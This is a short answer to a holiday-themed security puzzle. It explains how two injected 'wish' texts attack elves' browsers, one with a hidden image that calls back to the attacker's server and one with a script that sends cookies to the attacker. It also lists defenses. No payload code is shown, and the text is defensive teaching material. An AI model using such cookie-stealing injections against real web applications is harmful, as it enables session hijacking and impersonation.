By Ryan PavlikWhat is the purpose of the first malicious wish text, and how does it work?
It is a non-showing image file that causes the elves' browser to load a page off the naughty kid's web server. This could be logged (finding an internal IP address or similar, profiling browser, etc..), or could
exploit a browser security hole/buffer overflow with a malformed image.
What is the purpose of the second malicious wish text, and how does it work?
This submits the contents of the viewing elf's browser cookie to the attacker, by submitting it as a URL argument to a CGI script on the attacker's server. This could reveal, for instance, the password for the
web application. By recording that cookie, the attacker could impersonate the elf who viewed that wish.
How could Hermey and Rudolph thwart the first and second types of
attacks by altering the Web application? Alternatively, how could they stop these attacks by changing the configuration of the analyst elves' browsers?
They could have the web application filter out HTML tags, or possibly also the contents between them (to get rid of the script text, too). They could also disable javascript and images in the analyst elves'
browsers, though this may disrupt navigation in the web app, if it was not built to be dependent only on text. A safer route would be to disable javascript and disable loading images from remote servers. This
last option can be found in the recent Mozilla and Mozilla Firebird browsers (mozilla.org).
Beyond these browser-based attacks, Hermey was also concerned about
attackers submitting similar elements in children's wish lists submitted via e-mail. What are two different methods for defeating such attacks by altering an e-mail reader's configuration?
The simplest way of defeating this attack would be to disable HTML rendering in the email reader. If this is not feasible, Hermey could also disable Javascript and remote images in email, which probably
should be disabled already. Additionally, if NO HTML traffic was desired, the mail server could be set to filter out HTML emails.
Thank you!
Sincerely, Ryan Pavlik |
|